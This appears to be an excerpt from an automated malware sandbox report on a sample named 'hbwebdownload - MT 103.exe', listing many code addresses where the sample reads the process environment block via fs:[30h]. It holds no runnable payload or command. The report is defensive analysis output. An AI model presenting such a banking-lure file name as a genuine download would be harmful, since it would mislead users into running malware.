Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01316030 mov eax, dword ptr fs:[00000030h]	4_2_01316030
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0127A020 mov eax, dword ptr fs:[00000030h]	4_2_0127A020
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0127C020 mov eax, dword ptr fs:[00000030h]	4_2_0127C020
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01304000 mov ecx, dword ptr fs:[00000030h]	4_2_01304000
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01322000 mov eax, dword ptr fs:[00000030h]	4_2_01322000
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01322000 mov eax, dword ptr fs:[00000030h]	4_2_01322000
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01322000 mov eax, dword ptr fs:[00000030h]	4_2_01322000
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01322000 mov eax, dword ptr fs:[00000030h]	4_2_01322000
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01322000 mov eax, dword ptr fs:[00000030h]	4_2_01322000
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01322000 mov eax, dword ptr fs:[00000030h]	4_2_01322000
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01322000 mov eax, dword ptr fs:[00000030h]	4_2_01322000
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01322000 mov eax, dword ptr fs:[00000030h]	4_2_01322000
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0129E016 mov eax, dword ptr fs:[00000030h]	4_2_0129E016
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0129E016 mov eax, dword ptr fs:[00000030h]	4_2_0129E016
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0129E016 mov eax, dword ptr fs:[00000030h]	4_2_0129E016
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0129E016 mov eax, dword ptr fs:[00000030h]	4_2_0129E016
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AC073 mov eax, dword ptr fs:[00000030h]	4_2_012AC073
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01306050 mov eax, dword ptr fs:[00000030h]	4_2_01306050
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01282050 mov eax, dword ptr fs:[00000030h]	4_2_01282050
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012780A0 mov eax, dword ptr fs:[00000030h]	4_2_012780A0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013460B8 mov eax, dword ptr fs:[00000030h]	4_2_013460B8
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013460B8 mov ecx, dword ptr fs:[00000030h]	4_2_013460B8
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013180A8 mov eax, dword ptr fs:[00000030h]	4_2_013180A8
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128208A mov eax, dword ptr fs:[00000030h]	4_2_0128208A
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012880E9 mov eax, dword ptr fs:[00000030h]	4_2_012880E9
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0127A0E3 mov ecx, dword ptr fs:[00000030h]	4_2_0127A0E3
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013060E0 mov eax, dword ptr fs:[00000030h]	4_2_013060E0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0127C0F0 mov eax, dword ptr fs:[00000030h]	4_2_0127C0F0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C20F0 mov ecx, dword ptr fs:[00000030h]	4_2_012C20F0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013020DE mov eax, dword ptr fs:[00000030h]	4_2_013020DE
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01358324 mov eax, dword ptr fs:[00000030h]	4_2_01358324
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01358324 mov ecx, dword ptr fs:[00000030h]	4_2_01358324
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01358324 mov eax, dword ptr fs:[00000030h]	4_2_01358324
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01358324 mov eax, dword ptr fs:[00000030h]	4_2_01358324
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BA30B mov eax, dword ptr fs:[00000030h]	4_2_012BA30B
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BA30B mov eax, dword ptr fs:[00000030h]	4_2_012BA30B
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BA30B mov eax, dword ptr fs:[00000030h]	4_2_012BA30B
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0127C310 mov ecx, dword ptr fs:[00000030h]	4_2_0127C310
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A0310 mov ecx, dword ptr fs:[00000030h]	4_2_012A0310
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132437C mov eax, dword ptr fs:[00000030h]	4_2_0132437C
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01328350 mov ecx, dword ptr fs:[00000030h]	4_2_01328350
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0134A352 mov eax, dword ptr fs:[00000030h]	4_2_0134A352
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0130035C mov eax, dword ptr fs:[00000030h]	4_2_0130035C
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0130035C mov eax, dword ptr fs:[00000030h]	4_2_0130035C
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0130035C mov eax, dword ptr fs:[00000030h]	4_2_0130035C
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0130035C mov ecx, dword ptr fs:[00000030h]	4_2_0130035C
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0130035C mov eax, dword ptr fs:[00000030h]	4_2_0130035C
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0130035C mov eax, dword ptr fs:[00000030h]	4_2_0130035C
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01302349 mov eax, dword ptr fs:[00000030h]	4_2_01302349
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01302349 mov eax, dword ptr fs:[00000030h]	4_2_01302349
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01302349 mov eax, dword ptr fs:[00000030h]	4_2_01302349
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01302349 mov eax, dword ptr fs:[00000030h]	4_2_01302349
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01302349 mov eax, dword ptr fs:[00000030h]	4_2_01302349
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01302349 mov eax, dword ptr fs:[00000030h]	4_2_01302349
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01302349 mov eax, dword ptr fs:[00000030h]	4_2_01302349
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01302349 mov eax, dword ptr fs:[00000030h]	4_2_01302349
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01302349 mov eax, dword ptr fs:[00000030h]	4_2_01302349
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01302349 mov eax, dword ptr fs:[00000030h]	4_2_01302349
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01302349 mov eax, dword ptr fs:[00000030h]	4_2_01302349
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01302349 mov eax, dword ptr fs:[00000030h]	4_2_01302349
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01302349 mov eax, dword ptr fs:[00000030h]	4_2_01302349
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01302349 mov eax, dword ptr fs:[00000030h]	4_2_01302349
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01302349 mov eax, dword ptr fs:[00000030h]	4_2_01302349
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0135634F mov eax, dword ptr fs:[00000030h]	4_2_0135634F
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A438F mov eax, dword ptr fs:[00000030h]	4_2_012A438F
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A438F mov eax, dword ptr fs:[00000030h]	4_2_012A438F
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0127E388 mov eax, dword ptr fs:[00000030h]	4_2_0127E388
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0127E388 mov eax, dword ptr fs:[00000030h]	4_2_0127E388
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0127E388 mov eax, dword ptr fs:[00000030h]	4_2_0127E388
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01278397 mov eax, dword ptr fs:[00000030h]	4_2_01278397
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01278397 mov eax, dword ptr fs:[00000030h]	4_2_01278397
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01278397 mov eax, dword ptr fs:[00000030h]	4_2_01278397
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012903E9 mov eax, dword ptr fs:[00000030h]	4_2_012903E9
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012903E9 mov eax, dword ptr fs:[00000030h]	4_2_012903E9
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012903E9 mov eax, dword ptr fs:[00000030h]	4_2_012903E9
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012903E9 mov eax, dword ptr fs:[00000030h]	4_2_012903E9
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012903E9 mov eax, dword ptr fs:[00000030h]	4_2_012903E9
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012903E9 mov eax, dword ptr fs:[00000030h]	4_2_012903E9
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012903E9 mov eax, dword ptr fs:[00000030h]	4_2_012903E9
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012903E9 mov eax, dword ptr fs:[00000030h]	4_2_012903E9
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B63FF mov eax, dword ptr fs:[00000030h]	4_2_012B63FF
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0129E3F0 mov eax, dword ptr fs:[00000030h]	4_2_0129E3F0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0129E3F0 mov eax, dword ptr fs:[00000030h]	4_2_0129E3F0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0129E3F0 mov eax, dword ptr fs:[00000030h]	4_2_0129E3F0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013243D4 mov eax, dword ptr fs:[00000030h]	4_2_013243D4
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013243D4 mov eax, dword ptr fs:[00000030h]	4_2_013243D4
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0128A3C0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0128A3C0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0128A3C0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0128A3C0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0128A3C0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0128A3C0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012883C0 mov eax, dword ptr fs:[00000030h]	4_2_012883C0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012883C0 mov eax, dword ptr fs:[00000030h]	4_2_012883C0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012883C0 mov eax, dword ptr fs:[00000030h]	4_2_012883C0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012883C0 mov eax, dword ptr fs:[00000030h]	4_2_012883C0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132E3DB mov eax, dword ptr fs:[00000030h]	4_2_0132E3DB
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132E3DB mov eax, dword ptr fs:[00000030h]	4_2_0132E3DB
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132E3DB mov ecx, dword ptr fs:[00000030h]	4_2_0132E3DB
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132E3DB mov eax, dword ptr fs:[00000030h]	4_2_0132E3DB
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013063C0 mov eax, dword ptr fs:[00000030h]	4_2_013063C0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0133C3CD mov eax, dword ptr fs:[00000030h]	4_2_0133C3CD
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0127823B mov eax, dword ptr fs:[00000030h]	4_2_0127823B
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01330274 mov eax, dword ptr fs:[00000030h]	4_2_01330274
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01330274 mov eax, dword ptr fs:[00000030h]	4_2_01330274
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01330274 mov eax, dword ptr fs:[00000030h]	4_2_01330274
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01330274 mov eax, dword ptr fs:[00000030h]	4_2_01330274
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01330274 mov eax, dword ptr fs:[00000030h]	4_2_01330274
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01330274 mov eax, dword ptr fs:[00000030h]	4_2_01330274
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01330274 mov eax, dword ptr fs:[00000030h]	4_2_01330274
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01330274 mov eax, dword ptr fs:[00000030h]	4_2_01330274
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01330274 mov eax, dword ptr fs:[00000030h]	4_2_01330274
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01330274 mov eax, dword ptr fs:[00000030h]	4_2_01330274
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01330274 mov eax, dword ptr fs:[00000030h]	4_2_01330274
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01330274 mov eax, dword ptr fs:[00000030h]	4_2_01330274
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01284260 mov eax, dword ptr fs:[00000030h]	4_2_01284260
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01284260 mov eax, dword ptr fs:[00000030h]	4_2_01284260
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01284260 mov eax, dword ptr fs:[00000030h]	4_2_01284260
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0127826B mov eax, dword ptr fs:[00000030h]	4_2_0127826B
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0133A250 mov eax, dword ptr fs:[00000030h]	4_2_0133A250
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0133A250 mov eax, dword ptr fs:[00000030h]	4_2_0133A250
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0135625D mov eax, dword ptr fs:[00000030h]	4_2_0135625D
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01286259 mov eax, dword ptr fs:[00000030h]	4_2_01286259
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01308243 mov eax, dword ptr fs:[00000030h]	4_2_01308243
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01308243 mov ecx, dword ptr fs:[00000030h]	4_2_01308243
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0127A250 mov eax, dword ptr fs:[00000030h]	4_2_0127A250
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012902A0 mov eax, dword ptr fs:[00000030h]	4_2_012902A0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012902A0 mov eax, dword ptr fs:[00000030h]	4_2_012902A0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013162A0 mov eax, dword ptr fs:[00000030h]	4_2_013162A0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013162A0 mov ecx, dword ptr fs:[00000030h]	4_2_013162A0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013162A0 mov eax, dword ptr fs:[00000030h]	4_2_013162A0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013162A0 mov eax, dword ptr fs:[00000030h]	4_2_013162A0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013162A0 mov eax, dword ptr fs:[00000030h]	4_2_013162A0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013162A0 mov eax, dword ptr fs:[00000030h]	4_2_013162A0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BE284 mov eax, dword ptr fs:[00000030h]	4_2_012BE284
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BE284 mov eax, dword ptr fs:[00000030h]	4_2_012BE284
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01300283 mov eax, dword ptr fs:[00000030h]	4_2_01300283
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01300283 mov eax, dword ptr fs:[00000030h]	4_2_01300283
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01300283 mov eax, dword ptr fs:[00000030h]	4_2_01300283
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012902E1 mov eax, dword ptr fs:[00000030h]	4_2_012902E1
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012902E1 mov eax, dword ptr fs:[00000030h]	4_2_012902E1
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012902E1 mov eax, dword ptr fs:[00000030h]	4_2_012902E1
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013562D6 mov eax, dword ptr fs:[00000030h]	4_2_013562D6
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0128A2C3
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0128A2C3
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0128A2C3
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0128A2C3
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0128A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0128A2C3
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AE53E mov eax, dword ptr fs:[00000030h]	4_2_012AE53E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AE53E mov eax, dword ptr fs:[00000030h]	4_2_012AE53E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AE53E mov eax, dword ptr fs:[00000030h]	4_2_012AE53E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AE53E mov eax, dword ptr fs:[00000030h]	4_2_012AE53E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AE53E mov eax, dword ptr fs:[00000030h]	4_2_012AE53E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290535 mov eax, dword ptr fs:[00000030h]	4_2_01290535
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290535 mov eax, dword ptr fs:[00000030h]	4_2_01290535
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290535 mov eax, dword ptr fs:[00000030h]	4_2_01290535
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290535 mov eax, dword ptr fs:[00000030h]	4_2_01290535
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290535 mov eax, dword ptr fs:[00000030h]	4_2_01290535
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01290535 mov eax, dword ptr fs:[00000030h]	4_2_01290535
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01316500 mov eax, dword ptr fs:[00000030h]	4_2_01316500
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01354500 mov eax, dword ptr fs:[00000030h]	4_2_01354500
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01354500 mov eax, dword ptr fs:[00000030h]	4_2_01354500
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01354500 mov eax, dword ptr fs:[00000030h]	4_2_01354500
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01354500 mov eax, dword ptr fs:[00000030h]	4_2_01354500
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01354500 mov eax, dword ptr fs:[00000030h]	4_2_01354500
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01354500 mov eax, dword ptr fs:[00000030h]	4_2_01354500
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01354500 mov eax, dword ptr fs:[00000030h]	4_2_01354500
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B656A mov eax, dword ptr fs:[00000030h]	4_2_012B656A
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B656A mov eax, dword ptr fs:[00000030h]	4_2_012B656A
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B656A mov eax, dword ptr fs:[00000030h]	4_2_012B656A
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01288550 mov eax, dword ptr fs:[00000030h]	4_2_01288550
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01288550 mov eax, dword ptr fs:[00000030h]	4_2_01288550
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013005A7 mov eax, dword ptr fs:[00000030h]	4_2_013005A7
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013005A7 mov eax, dword ptr fs:[00000030h]	4_2_013005A7
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013005A7 mov eax, dword ptr fs:[00000030h]	4_2_013005A7
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A45B1 mov eax, dword ptr fs:[00000030h]	4_2_012A45B1
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012A45B1 mov eax, dword ptr fs:[00000030h]	4_2_012A45B1
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B4588 mov eax, dword ptr fs:[00000030h]	4_2_012B4588
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01282582 mov eax, dword ptr fs:[00000030h]	4_2_01282582
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01282582 mov ecx, dword ptr fs:[00000030h]	4_2_01282582
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BE59C mov eax, dword ptr fs:[00000030h]	4_2_012BE59C
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BC5ED mov eax, dword ptr fs:[00000030h]	4_2_012BC5ED
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BC5ED mov eax, dword ptr fs:[00000030h]	4_2_012BC5ED
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012825E0 mov eax, dword ptr fs:[00000030h]	4_2_012825E0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AE5E7 mov eax, dword ptr fs:[00000030h]	4_2_012AE5E7
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AE5E7 mov eax, dword ptr fs:[00000030h]	4_2_012AE5E7
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AE5E7 mov eax, dword ptr fs:[00000030h]	4_2_012AE5E7
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AE5E7 mov eax, dword ptr fs:[00000030h]	4_2_012AE5E7
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AE5E7 mov eax, dword ptr fs:[00000030h]	4_2_012AE5E7
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AE5E7 mov eax, dword ptr fs:[00000030h]	4_2_012AE5E7
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AE5E7 mov eax, dword ptr fs:[00000030h]	4_2_012AE5E7
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012AE5E7 mov eax, dword ptr fs:[00000030h]	4_2_012AE5E7
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BE5CF mov eax, dword ptr fs:[00000030h]	4_2_012BE5CF
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BE5CF mov eax, dword ptr fs:[00000030h]	4_2_012BE5CF
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012865D0 mov eax, dword ptr fs:[00000030h]	4_2_012865D0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BA5D0 mov eax, dword ptr fs:[00000030h]	4_2_012BA5D0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012BA5D0 mov eax, dword ptr fs:[00000030h]	4_2_012BA5D0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0127C427 mov eax, dword ptr fs:[00000030h]	4_2_0127C427
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0127E420 mov eax, dword ptr fs:[00000030h]	4_2_0127E420
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0127E420 mov eax, dword ptr fs:[00000030h]	4_2_0127E420
